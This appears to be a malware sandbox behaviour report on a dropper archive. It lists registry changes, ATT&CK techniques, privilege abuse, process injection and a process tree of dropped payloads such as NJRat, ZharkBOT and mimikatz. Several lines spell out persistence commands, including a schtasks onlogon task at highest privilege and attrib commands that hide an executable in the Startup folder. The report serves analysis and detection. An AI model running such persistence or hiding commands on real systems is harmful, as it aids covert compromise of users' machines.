Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133762564525573234"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	chrome.exe
Key created	\Registry\User\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\NotificationData	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 50003100000000007059f095100046696c6573003c0009000400efbe7059f0957059f0952e000000c95c0200000003000000000000000000000000000000f2c80900460069006c0065007300000014000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000cc69a518af18db01a61accf75738db01a61accf75738db0114000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
6060	reg.exe
6344	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1976	schtasks.exe
7468	schtasks.exe
9132	schtasks.exe
9248	schtasks.exe
3872	schtasks.exe
6280	schtasks.exe
4816	schtasks.exe
5996	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
972	chrome.exe
972	chrome.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe
1164	NJRat.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1976	7zFM.exe
3964	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1976	7zFM.exe
Token: 35	1976	7zFM.exe
Token: SeSecurityPrivilege	1976	7zFM.exe
Token: SeDebugPrivilege	3352	4363463463464363463463463.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeDebugPrivilege	2908	Discord2.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeDebugPrivilege	240	Discord.exe
Token: SeDebugPrivilege	240	Discord.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeDebugPrivilege	1572	4363463463464363463463463.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeDebugPrivilege	1164	NJRat.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeDebugPrivilege	800	CompleteStudio.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
1976	7zFM.exe
1976	7zFM.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
3964	chrome.exe
4192	RegAsm.exe
4548	Authenticator222.exe
4984	winbox.exe
3436	ZharkBOT.exe
4636	Applaunch.exe
3712	cmd.exe
2588	mimikatz.exe
3016	Newofff.exe
4460	Hkbsse.exe
2208	yxrd0ob7.exe
5092	twztl.exe
3440	11.exe
3964	chrome.exe
3964	chrome.exe
1128	install2.exe
4152	test.exe
436	test.exe
3400	test.exe
1332	test.exe
3088	test.exe
2564	test.exe
2264	2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 972 wrote to memory of 4320	972	chrome.exe	87
PID 972 wrote to memory of 4320	972	chrome.exe	87
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 2860	972	chrome.exe	88
PID 972 wrote to memory of 3164	972	chrome.exe	89
PID 972 wrote to memory of 3164	972	chrome.exe	89
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90
PID 972 wrote to memory of 2420	972	chrome.exe	90

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1264	attrib.exe
2352	attrib.exe
8736	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1976

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3352
- C:\Users\Admin\Desktop\Files\Discord2.exe
  "C:\Users\Admin\Desktop\Files\Discord2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3156
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE151.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2432
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3452
  - - C:\Users\Admin\AppData\Roaming\Discord.exe
      "C:\Users\Admin\AppData\Roaming\Discord.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:240
- C:\Users\Admin\Desktop\Files\87f3f2.exe
  "C:\Users\Admin\Desktop\Files\87f3f2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3660
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4632
- C:\Users\Admin\Desktop\Files\Authenticator222.exe
  "C:\Users\Admin\Desktop\Files\Authenticator222.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4548
- C:\Users\Admin\Desktop\Files\winbox.exe
  "C:\Users\Admin\Desktop\Files\winbox.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4984
- C:\Users\Admin\Desktop\Files\file1.exe
  "C:\Users\Admin\Desktop\Files\file1.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:2408
- C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe
  "C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  PID:1176
- C:\Users\Admin\Desktop\Files\ZharkBOT.exe
  "C:\Users\Admin\Desktop\Files\ZharkBOT.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 448
    3⤵
    - Program crash
    PID:3156
- C:\Users\Admin\Desktop\Files\Fast%20Download.exe
  "C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3692
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1264
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2352
- C:\Users\Admin\Desktop\Files\Newofff.exe
  "C:\Users\Admin\Desktop\Files\Newofff.exe"
  2⤵
  - Executes dropped EXE
